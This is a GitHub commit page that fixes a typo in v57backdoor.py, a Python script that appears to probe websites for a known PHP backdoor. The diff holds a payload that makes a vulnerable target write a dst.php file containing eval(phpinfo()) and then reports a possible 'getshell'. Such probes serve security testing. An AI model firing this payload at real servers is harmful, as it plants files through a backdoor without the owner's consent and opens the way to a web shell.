Skip to content

Commit

Permalink
Update v57backdoor.py
Browse files Browse the repository at this point in the history
fix phpindo(); to phpinfo();
  • Loading branch information
Mr-xn committed Mar 11, 2020
1 parent 42bc196 commit accf116
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions script/v57backdoor.py
Original file line number Diff line number Diff line change
Expand Up @@ -11,7 +11,7 @@ def checktrace(self):
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "$a=${@file_put_contents(\"dst.php\",\"<?php eval(phpindo();); ?>\")};"
payload = "$a=${@file_put_contents(\"dst.php\",\"<?php eval(phpinfo();); ?>\")};"
if ':https://' not in self.url:
self.url = 'https://' + self.url + '/'
url = self.url
Expand All @@ -21,4 +21,4 @@ def checktrace(self):
if m.status_code == 200 and "phpinfo" in m.text:
cprint("target may be backdoor getshell:" + url,"red")
except:
return False
return False

0 comments on commit accf116

Please sign in to comment.